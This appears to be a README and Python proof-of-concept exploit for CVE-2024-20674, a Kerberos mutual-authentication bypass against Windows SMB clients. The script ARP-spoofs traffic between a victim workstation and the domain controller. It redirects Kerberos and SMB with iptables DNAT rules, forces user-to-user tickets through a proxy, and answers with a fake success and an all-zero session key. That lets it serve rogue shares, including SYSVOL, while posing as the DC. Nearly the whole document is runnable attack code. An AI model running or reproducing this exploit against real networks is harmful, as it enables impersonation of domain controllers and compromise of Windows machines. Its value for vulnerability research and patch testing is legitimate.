README.md
Rendering markdown...
"""
SMB server that bypasses Kerberos client mutual-auth validation.
CVE-2024-20674
```
sudo iptables -I OUTPUT -p icmp -m icmp --icmp-type host-unreachable -j DROP
sudo iptables -I OUTPUT -p icmp -m icmp --icmp-type port-unreachable -j DROP
sudo sysctl net.ipv4.conf.virbr1.forwarding=1
sudo sysctl net.ipv4.conf.all.send_redirects=0
sudo sysctl net.ipv4.conf.virbr1.send_redirects=0
sudo iptables -t nat -A PREROUTING -d <DCIP> -p tcp --dport 88 -j DNAT --to-destination <ATTACKERIP>
sudo iptables -t nat -A PREROUTING -d <DCIP> -p tcp --dport 445 -j DNAT --to-destination <ATTACKERIP>
```
"""
import os
import sys
import threading
import socket
from scapy.ansmachine import AnsweringMachineTCP
from scapy.arch import get_if_addr
from scapy.config import conf
from scapy.interfaces import resolve_iface
from scapy.layers.dns import dns_resolve
from scapy.layers.gssapi import (
GSS_S_CREDENTIALS_EXPIRED,
GSS_S_CONTINUE_NEEDED,
GSS_S_COMPLETE,
)
from scapy.layers.kerberos import *
from scapy.layers.l2 import arp_mitm, arpcachepoison, ARP_am, getmacbyip
from scapy.layers.smbserver import smbserver
from scapy.layers.spnego import SPNEGOSSP
from scapy.libs.rfc3961 import Key, EncryptionType
class KerberosBypass(KerberosSSP):
    """
    A SMB server that triggers the U2U vulnerability

    While the context is in its initial state the client's token is not
    validated; a KRB_ERROR is sent back instead:

    - for a user-to-user ``KRB_TGT_REQ``: a ``KRB_ERR_GENERIC`` error whose
      e-data carries a zero status, reported to the caller as
      ``GSS_S_COMPLETE`` with an all-zero 16-byte session key;
    - for any other request: ``KRB_AP_ERR_TKT_NYV``, reported as
      ``GSS_S_CONTINUE_NEEDED``.

    Any other context state is delegated to ``KerberosSSP``.
    """

    def AcceptSecurityContext(self, Context, val=None):
        """
        Process one token received from the client.

        :param Context: the current context, or None to create a new one.
        :param val: the client's token, either GSSAPI-wrapped or raw Kerberos.
        :returns: a ``(Context, token, status)`` tuple on every path.
        """
        if Context is None:
            # New context
            Context = self.CONTEXT()

        if Context.state != self.STATE.INIT:
            return super(KerberosBypass, self).AcceptSecurityContext(Context, val=val)

        if val is None:
            # Nothing to parse: report it the same way as an unparsable token
            # rather than crashing on val.show() below.
            return Context, None, GSS_S_DEFECTIVE_TOKEN

        val.show()
        try:
            # GSSAPI/Kerberos
            ap_req = val.root.innerContextToken.root
        except AttributeError:
            try:
                # Raw Kerberos
                ap_req = val.root
            except AttributeError:
                # Keep the 3-tuple shape used by every other return path
                return Context, None, GSS_S_DEFECTIVE_TOKEN

        # Both error replies share the same timestamp and service name.
        now_time = datetime.utcnow().replace(microsecond=0)
        sname = PrincipalName(
            nameString=[ASN1_GENERAL_STRING(x) for x in self.SPN.split("/")],
            nameType=ASN1_INTEGER(2),  # NT-SRV-INST in RFC 4120
        )

        # The U2U case
        if isinstance(ap_req, KRB_TGT_REQ):
            # Build error to TGT-REQ
            err = KRB_InitialContextToken(
                MechType="1.2.840.113554.1.2.2.3",  # U2U
                innerContextToken=KRB5_InitialContextToken_PDU(
                    TOK_ID=b"\x03\x00",
                    root=KRB_ERROR(
                        errorCode="KRB_ERR_GENERIC",
                        stime=ASN1_GENERALIZED_TIME(now_time),
                        realm=ap_req.realm,
                        sname=sname,
                        eData=KERB_ERROR_DATA(
                            dataType=1,
                            dataValue=struct.pack("<I", 0),  # "SUCCESS" error
                        ),
                    ),
                ),
            )
            # Set the SessionKey to zeros
            Context.SessionKey = b"\x00" * 16
            # Return a fake success
            return Context, err, GSS_S_COMPLETE

        # Not U2U: force ticket renewal via DC
        err = KRB_ERROR(
            errorCode="KRB_AP_ERR_TKT_NYV",
            stime=ASN1_GENERALIZED_TIME(now_time),
            realm=ap_req.ticket.realm,
            sname=sname,
        )
        return Context, err, GSS_S_CONTINUE_NEEDED
class KRB_TGSREQ_ANS(AnsweringMachineTCP):
    """
    An answering machine that forces all TGS-REQ to require U2U

    A TGS-REQ for a ``cifs`` service that does not have KDC option bit 28
    set is answered locally with ``KDC_ERR_MUST_USE_USER2USER``. Every other
    message is forwarded to the DC and the DC's reply is returned.
    """
    filter = "tcp port 88"

    def parse_options(self, DC_IP=None, port=88, cls=KerberosTCPHeader):
        """
        Store the DC address and hand the remaining options to the parent.

        :param DC_IP: address of the real DC that non-matching requests are
            forwarded to.
        :param port: TCP port, passed to the parent and reused for the DC.
        :param cls: packet class passed to the parent, also used to parse
            the DC's reply.
        """
        self.DC_IP = DC_IP
        super(KRB_TGSREQ_ANS, self).parse_options(port=port, cls=cls)

    def make_reply(self, req, address):
        """
        Build the answer to one request.

        :param req: the parsed request.
        :param address: the peer address (unused here).
        :returns: a locally-built KRB_ERROR, or the DC's reply parsed with
            ``self.cls``.
        """
        if (
            isinstance(req.root, KRB_TGS_REQ)
            # bit 28 is ENC-TKT-IN-SKEY in RFC 4120, i.e. the U2U flag
            and req.root.reqBody.kdcOptions.val[28] != '1'
            and req.root.reqBody.sname.nameString[0].val.lower() == b"cifs"
        ):
            # TGS-REQ that is not U2U
            now_time = datetime.utcnow().replace(microsecond=0)
            return KerberosTCPHeader()/Kerberos(
                root=KRB_ERROR(
                    errorCode="KDC_ERR_MUST_USE_USER2USER",
                    stime=ASN1_GENERALIZED_TIME(now_time),
                    realm=req.root.reqBody.realm,
                    sname=req.root.reqBody.sname,
                )
            )

        # passthrough
        # The context manager closes the socket even if connect/send/recv
        # raises; sendall() guarantees the whole request is written.
        with socket.socket() as s:
            s.connect((self.DC_IP, self.port))
            s.sendall(bytes(req))
            # NOTE(review): a single recv() may return only part of a large
            # reply - confirm whether replies can exceed one segment.
            res = s.recv(65535)
        return self.cls(res)
class SPNEGO_FORCE_KRB(SPNEGOSSP):
    """
    SPNEGO SSP that replaces the server-initiated token with three fixed
    octets, so that "raw" Kerberos is used for auth instead of
    SPNEGO/Kerberos.
    """

    def NegTokenInit2(self):
        """
        Server-Initiation of GSSAPI/SPNEGO.
        See [MS-SPNG] sect 3.2.5.2

        :returns: a ``(Context, token)`` pair where the token is the fixed
            byte string rather than a real NegTokenInit2.
        """
        # thanks https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
        raw_token = b"\x00\x01\x40"
        ctx = self.CONTEXT(
            self.supported_ssps,
            force_supported_mechtypes=self.force_supported_mechtypes,
        )
        return ctx, raw_token
if __name__ == "__main__":
    # Debug
    from scapy.compat import hex_bytes
    from scapy.config import conf
    from scapy.themes import DefaultTheme

    conf.color_theme = DefaultTheme()

    # The SMB shares are served from a "demo" folder next to this script.
    script_dir = os.path.dirname(__file__)
    demopath = os.path.abspath(os.path.join(script_dir, "demo"))
    if not os.path.exists(demopath):
        print("demo/ folder is not next to exploit.py !")
        sys.exit(1)

    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument("IP", help="the victim IPv4 (Windows Workstation)")
    parser.add_argument("DC", help="the DC DNS name (e.g. dc1.domain.local)")
    parser.add_argument(
        "--no-mitm",
        action="store_true",
        help="Do not launch MITM. You need to do it manually",
    )
    args = parser.parse_args()

    # get the network interface
    route_to_victim = conf.route.route(args.IP)
    iface = resolve_iface(route_to_victim[0])
    print("| Using interface", iface)

    # get the DC IP
    try:
        DC_IP = dns_resolve(args.DC).rdata
    except AttributeError:
        # dns_resolve() gave back something without an rdata attribute
        print("Can't resolve DC name !")
        sys.exit(1)
    print("| Resolved the DC name to ", DC_IP)

    if not args.no_mitm:
        # start arp mitm of the DC <-> victim
        print("+ Starting arp_mitm")
        macvict = getmacbyip(args.IP)
        arp_thread = threading.Thread(
            target=arp_mitm,
            args=[DC_IP, args.IP],
            kwargs={"mac2": macvict},
        )
        arp_thread.start()
        arp_ans = threading.Thread(target=ARP_am(IP_addr=DC_IP, iface=iface))
        arp_ans.start()
        arpcachepoison(
            args.IP,
            (get_if_addr(iface), "aa:bb:cc:dd:ee:ff"),
            verbose=False,
            count=1,
            interval=0,
        )

    # start the Kerberos proxy
    print("+ Starting Kerberos proxy")
    krb_proxy_thread = threading.Thread(
        target=KRB_TGSREQ_ANS(),
        kwargs={"DC_IP": DC_IP, "iface": iface},
    )
    krb_proxy_thread.start()

    # start SMB server
    zero_key = Key(EncryptionType.AES256, key=b"\x00" * 32)
    kerberos_ssp = KerberosBypass(SPN="cifs/" + args.DC, KEY=zero_key)
    smbserver(
        iface=iface,
        debug=4,
        # -- SMB config
        root_path=demopath,
        SHARES=[b"Scapy", b"Stuff", b"SYSVOL"],
        LOCAL_IPS=[DC_IP],
        # DOMAIN_REFERRALS=["\\DOMAIN", "\\domain.local"],
        ssp=SPNEGO_FORCE_KRB([kerberos_ssp]),
    )